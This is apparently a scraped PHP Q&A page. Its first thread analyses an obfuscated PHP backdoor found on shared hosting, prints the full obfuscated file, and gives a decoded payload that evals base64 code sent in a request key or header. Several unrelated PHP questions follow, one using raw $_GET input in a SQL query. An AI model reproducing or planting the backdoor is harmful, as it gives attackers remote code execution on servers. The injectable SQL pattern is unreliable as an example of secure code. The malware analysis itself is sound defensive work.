About a week ago, I noticed there was a seemingly randomly named PHP file that had appeared in the root folder of my shared web hosting. The name of the file is "hvkqwvkj.php" and I very stupidly removed it before I looked at the owner/group and permission information. I'd like to know what this is and how it got there. Here is the contents of that file:
<?php
$circulated='ad,$E)eNf'; $chickadees= 't';$glissade ='TeUs';$antoinette= '6'; $lithic='o'; $hydrophobic='TR)iec$$W';$blaspheming='G';$eerily= 'u';$diagrammer =']A))eDO'; $huh= '(rCS/H:s';$din = 'g'; $harri = '.';$housed ='S';$browbeating = 'E(K+Nl';$deniable = 'dew_'; $flared='[';$baseboards = 'R;I';$conversed= '-'; $jammed = 'C'; $confident ='s';$homed ='a'; $bullock ='?';$asdf = 'T$v]';$debugs= 'LV9[U';$cheaters='$'; $juice = ';';$impropriety=')Hf6]tNar'; $fluently= '>(e;_sa'; $antagonism='t';
$jaquith= '"i_K4W';$canal ='(';$bookie='i';
$envies ='_n';$copyright='Pns#iSd'; $hampers='$'; $incontrovertible ='Te['; $irking ='?';$citadel ='iRy=';
$economizing= 'b'; $campanile = 'y'; $awn = 'N'; $compacting='c'; $journalist= 'O'; $evaluate = 'nQ:'; $booking = 'e'; $dolt= '_Q';$bottoming='U';$grabs= 'H';$covers ='(rrta';$breakfasted ='T_"(_uTM_';$confectionery = 'A'; $bolstered = 'E'; $kitti='a'; $kali ='neWn';$jersey ='e'; $fewer= 'a';
$earthmove ='a';$forgivable='1'; $hello =';Sru';$forwent = 'g';$gingham = '?';$fanatic='ot(RstP';$levee='S';$baser = 'B_,"c';$constructs= 'rai';$deletions='u';$attempters='g"sss_';$dispatcher ='ra=';$ken =')';$contrivance = '[D)dae'; $chrome ='i';$glutting='I<'; $devoutness= ';';$foible= '8';
$diagonally='$5D(vn';
$beauregard ='S';$ines='te]ee'; $imogen = 's';
$irene ='("as3:0$r';$grassier ='4';
$consortium ='r'; $appliance ='S'; $histochemistry= 'A'; $beamer='v';$enchain ='s'; $assaults= 'E';$davida='dNe'; $foamed= 'E)n';$cavity='=l';
$drudge='F';
$arraigning= 'p_E "i'; $firmware='",)a(';$jeanine= ')';
$equivalently ='"7$p'; $biller='m'; $likeness= 'i'; $closest = 'OP(vVrwJ$'; $commissioner='rU)o2';
$kaycee= 'c';$fanni = $kaycee['0'] .$commissioner[0] .$davida[2] .$firmware['3'].
$ines['0'] . $davida[2] . $arraigning['1'].$impropriety[2].$deletions. $foamed['2'] . $kaycee['0'].$ines['0']. $likeness . $commissioner[3].$foamed['2'];
$bob=$arraigning[3];
$druggist= $fanni ($bob,$davida[2] . $closest['3'].$firmware['3']. $cavity['1'] .$closest['2'].$firmware['3']. $commissioner[0]. $commissioner[0].
$firmware['3']. $campanile .$arraigning['1'].$equivalently['3'] . $commissioner[3] .$equivalently['3'] .
$closest['2'].$impropriety[2] .$deletions . $foamed['2'] . $kaycee['0'].$arraigning['1'] .
$attempters['0'] .$davida[2]. $ines['0'] .$arraigning['1']. $firmware['3'] . $commissioner[0] .$attempters['0'].$enchain .
$closest['2'] .$commissioner['2'] . $commissioner['2'] .$commissioner['2'] . $devoutness);$druggist ($closest['2'] ,$gingham,$attempters['0'],$dinnie['2'] ,$gwenneth ,$biller, $disdains[2],$closest['0'],$harri , $closest['8'] .$likeness. $cavity['0'].$firmware['3'] . $commissioner[0].
$commissioner[0].$firmware['3'] .
$campanile . $arraigning['1']. $biller.
$davida[2] .
$commissioner[0] . $attempters['0']. $davida[2] .$closest['2'] .$closest['8'] .$arraigning['1'].
$fanatic['3'] . $arraigning['2'].$dolt[1] .$commissioner['1'] .
$arraigning['2']. $appliance . $breakfasted[6]. $firmware['1'] .
$closest['8']. $arraigning['1'].
$jammed.$closest['0'].$closest['0'] .$jaquith['3'].
$glutting['0'] .
$arraigning['2']. $firmware['1']. $closest['8'] . $arraigning['1'].$appliance. $arraigning['2'].
$fanatic['3'] .$closest['4']. $arraigning['2'] . $fanatic['3'].$commissioner['2'] .
$devoutness. $closest['8'].$firmware['3']. $cavity['0'] . $likeness.$enchain. $enchain.
$davida[2] .
$ines['0'] . $closest['2'] .
$closest['8'] .$likeness. $contrivance[0].
$equivalently['0']. $foamed['2'] . $davida['0'].
$enchain .
$enchain.$closest['6'] .$firmware['3']. $foamed['2'].$deletions .$equivalently['0']. $ines[2] . $commissioner['2'].$gingham .
$closest['8'] .$likeness .$contrivance[0] .
$equivalently['0'].
$foamed['2'] . $davida['0'] .$enchain .$enchain .$closest['6'].$firmware['3'].$foamed['2'].$deletions .
$equivalently['0'] .
$ines[2] . $irene['5'] . $closest['2'].$likeness . $enchain. $enchain.$davida[2].$ines['0'] .$closest['2'].$closest['8'] . $likeness. $contrivance[0] .$equivalently['0'] . $grabs.$breakfasted[6] . $breakfasted[6] . $closest['1'] .$arraigning['1'] . $davida['1'].$diagonally[2] . $appliance.
$appliance .
$kali['2'].$histochemistry . $davida['1'].$commissioner['1'] . $equivalently['0'] . $ines[2].$commissioner['2'].$gingham. $closest['8'].
$likeness.$contrivance[0].
$equivalently['0'].$grabs .$breakfasted[6].$breakfasted[6] . $closest['1']. $arraigning['1'].$davida['1']. $diagonally[2] .$appliance .
$appliance. $kali['2'].$histochemistry . $davida['1'].$commissioner['1'].$equivalently['0'] . $ines[2] . $irene['5'].
$davida['0'] . $likeness.$davida[2]. $commissioner['2'].$devoutness.$davida[2]. $closest['3'] .$firmware['3'] .
$cavity['1'] .$closest['2'] . $enchain. $ines['0'] . $commissioner[0] .
$commissioner[0] .$davida[2].$closest['3'] . $closest['2']. $economizing .$firmware['3'].
$enchain.$davida[2] .$impropriety['3']. $grassier .$arraigning['1']. $davida['0'].$davida[2].$kaycee['0']. $commissioner[3].$davida['0'] .
$davida[2] .
$closest['2'].
$enchain.$ines['0'] .$commissioner[0] . $commissioner[0]. $davida[2] .$closest['3'] . $closest['2'].$closest['8']. $firmware['3'].$commissioner['2'].
$commissioner['2']. $commissioner['2'] . $commissioner['2'].
$devoutness );
I was able to parse out the actual coding.
The file employs obscurity to avoid detection. It defines a function and then uses eval to execute it.
Here is the payload (the important bit).
//Take all types of request data and merge them
//This opens up many types of attack vectors
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
//Look for a specific injected key called "ndsswanu" or HTTP_NDSSWANU and records its value if its set
$a = isset($i["ndsswanu"]
) ? $i["ndsswanu"] : (isset($i["HTTP_NDSSWANU"]) ? $i["HTTP_NDSSWANU"] : die);
//execute it
//iirc the reason for the double reverse is to avoid some characters being improperly encoded in base64.
//This statement runs any php code sent in the "ndsswanu" or HTTP_NDSSWANU key.
eval(strrev(base64_decode(strrev($a))));
You were correct to remove it immediately, however this is only a symptom of a greater problem. How the script got there is of a much larger concern.
This code would allow an attacker to remotely run any php code via a varied amount of attack vectors.
Related
I'm setting a variable based on an array. When I echo the variable it displays on the screen, however when I try to add it to a Header Location it doesn't show up in the URL of the next page - everything else does:
$myid = $selected_cat3[0]['id'];
Header("Location:/cat-dashboard/cat-results/?catID=" . $myid
. "&question1=" . $_GET['question1'] . "&question2=" . $_GET['question2']
. "&question3=" . $_GET['question3'] . "&question4=" . $_GET['question4']
. "&question5=" . $_GET['question5'] . "&question6=" . $_GET['question6']
. "&question7=" . $_GET['question7'] . "&question8=" . $_GET['question8']);
This is the generated url:
/cat-dashboard/cat-results/?catID=&question1=0&question2=3&question3=1&question4=1&question5=1&question6=2&question7=1&question8=3
Am I doing something wrong? It doesn't show even if I use: $myid = "1";
I'm having trouble sending a parameter into a url of another page. I'm new to coding in PHP so I do not really know how to get this through, already did some research on this about the $_GET method, but its still not working.
Code in 1st page:
echo "<tr><td><a href='application_desktop.php?id='". $temp ."'>" . $row['appl_nric_date'] . "</td><td>" . $row['applicant_name'] . "</td><td>" . $row['nric'] . "</td><td>" . $row['application_date'] . "</a></td></tr>";
where $temp is the parameter I want to pass to the url.
Code in 2nd page:
$id = $_GET['id'];
$applicants = mysql_query("SELECT * FROM tblapplication WHERE appl_nric_date = $id");
//$applicants = mysql_query("SELECT * FROM tblapplication WHERE appl_nric_date = 10");
The sql query returns error that the $id is null, and the url doesn't display the id.
Do it like this on your html line
echo "<tr><td>" . $row['appl_nric_date'] . "</td><td>" . $row['applicant_name'] . "</td><td>" . $row['nric'] . "</td><td>" . $row['application_date'] . "</td></tr>";
I ran your code to see what it output:
// Make some sample data
$row = [
'appl_nric_date' => '9999-99-99',
'applicant_name' => 'some-applicant',
'nric' => 'wtf-is-an-nric',
'application_date' => '8888-99-00'
];
$temp = 'something';
echo "<tr><td><a href='application_desktop.php?id='". $temp ."'>"
. $row['appl_nric_date']
. "</td><td>"
. $row['applicant_name']
. "</td><td>"
. $row['nric']
. "</td><td>"
. $row['application_date'] . "</a></td></tr>";
echo PHP_EOL;
This is what it outputs:
<tr><td><a href='application_desktop.php?id='something'>9999-99-99</td><td>some-applicant</td><td>wtf-is-an-nric</td><td>8888-99-00</a></td></tr>
The use of single quotes is not right. Remove the single quote after id=.
Looks like you are not nesting your html elements correctly. You place the opening A tag inside the first TD but then you close that TD without closing the A tag.
In order to debug what you are doing this in the browser, then the address bar where the url lives should show the parameters that are sent to the destination page. You can just look at that to verify that it sent what you intended.
In the destination page, you can add the following to debug:
<pre>
<?php print_r($_GET) ?>
</pre>
The above will let you see what you are getting from the first page.
I'm trying to send email(s) after submitting a form, I want to achieve:
1) If field is empty then no need to send table row to mail. Just like the field age below is optional, user might add his/her age or might not, so how to do it in switmail $message->addPart('Message','text/html') function.
I tried but failed saying:
Parse error: syntax error, unexpected 'if' (T_IF) in...
The issue is only with if.. without if statement everything works fine.
$content = '<table>
...
<tr><td>' . $_POST["firstname"] . '<td></tr>
' . if(!empty($_POST["age"])) {
. '<tr><td>' . $_POST["age"] . '</td></tr>' .
}
...
<table>';
$message->addPart($content, 'text/html');
Do it outside of the $content variable.
$age = (!empty($_POST["age"])) ? '<tr><td>' . $_POST["age"] . '</td></tr>' : '';
$content = '<table>
...
<tr><td>' . $_POST["firstname"] . '<td></tr>'
. $age . '
...
<table>';
I am creating a flight/hotel reservation system like farecompare.com Farecompare parse values to other sites and create sessions other sites too. Anyone tell me how they create sesssions in it. I can parse url but i am not able to create sessions.
public function flight($depart, $return, $from, $to, $type, $class,
$adults, $seniors, $children) {
$dep = explode("/", $depart);
$ret = explode("/", $return);
if ($type == 'RoundTrip') {
$expurl = 'http://www.expedia.co.in/Flights-Search?trip=' .
strtolower($type) . '&leg1=from%3A' . $from .
'%29%2Cto%3A' . $to .
'%29%2Cdeparture%3A' . $dep[1] .
'/'.$dep[0].'/'.$dep[2].
'TANYT&leg2=from%3A' . $to .
'%29%2Cto%3A' . $from .
'%29%2Cdeparture%3A' .
$ret[1].'/'.$ret[0].'/'.$ret[2] .
'TANYT&passengers=children%3A' . $children .
'%2Cadults%3A' . $adults .
'%2Cseniors%3A' . $seniors .
'%2Cinfantinlap%3AY&options=cabinclass%3Aeconomy'.
'%2Cnopenalty%3AN%2Csortby%3Aprice&mode=search';
echo 'Expedia';
} else {
$type = 'oneway';
$expurl = 'http://www.expedia.co.in/Flights-Search?trip='.
strtolower($type) . '&leg1=from%3A' . $from .
'%29%2Cto%3A' . $to . '%29%2Cdeparture%3A' .
$dep[1].'/'.$dep[0].'/'.$dep[2] .
'TANYT&passengers=children%3A' . $children .
'%2Cadults%3A' . $adults .
'%2Cseniors%3A' . $seniors .
'%2Cinfantinlap%3AY&options=cabinclass%3Aeconomy'.
'%2Cnopenalty%3AN%2Csortby%3Aprice&mode=search';
echo 'Expedia';
}
}
I worked on Expedia by parsing url to get data but there are other sites like cheapoait, travelocity etc which uses sessions. How to create sessions?
I would assume they store it in the cookies.
We can not access session data of other domain on our site. Data transfer done using web services SOAP OR REST in form of XML. That can be retrieved on other domain and store in session and cookies and use for calculation in website.
I have a huge list of stuff for a glossary ( about 17 pages worth ) that I have to put into an XML file. So I decided I'd use php to make it. My code works, except where ALL the XML code is, it doesn't show because it's trying to render it. Help?
$arg=explode("\n", $strang);
echo count($arg);
for ($i=0;$i<=count($arg);$i=$i+3)
{
echo "<word id='" . $arg[$i+1] . "'>";
echo "<desc>" . $arg[$i] . " - " . $arg[$i+2] . "</desc>";
echo "<pic></pic>";
echo "<audio></audio>";
}
I assume by render it you mean in your browser? If so, you'll need to escape the characters so they will be interpreted literally rather than as markup.
Check out htmlspecialchars and htmlentities
use CDATA construction:
echo "<desc><![CDATA[" . $arg[$i] . " - " . $arg[$i+2] . "]]></desc>";
If this is your entire script, fastest way would probably be to swap all of the <'s with <
$arg=explode("\n", $strang);
echo count($arg);
for ($i=0;$i<=count($arg);$i=$i+3)
{
echo "<word id='" . $arg[$i+1] . "'>";
echo "<desc>" . $arg[$i] . " - " . $arg[$i+2] . "</desc>";
echo "<pic></pic>";
echo "<audio></audio>";
}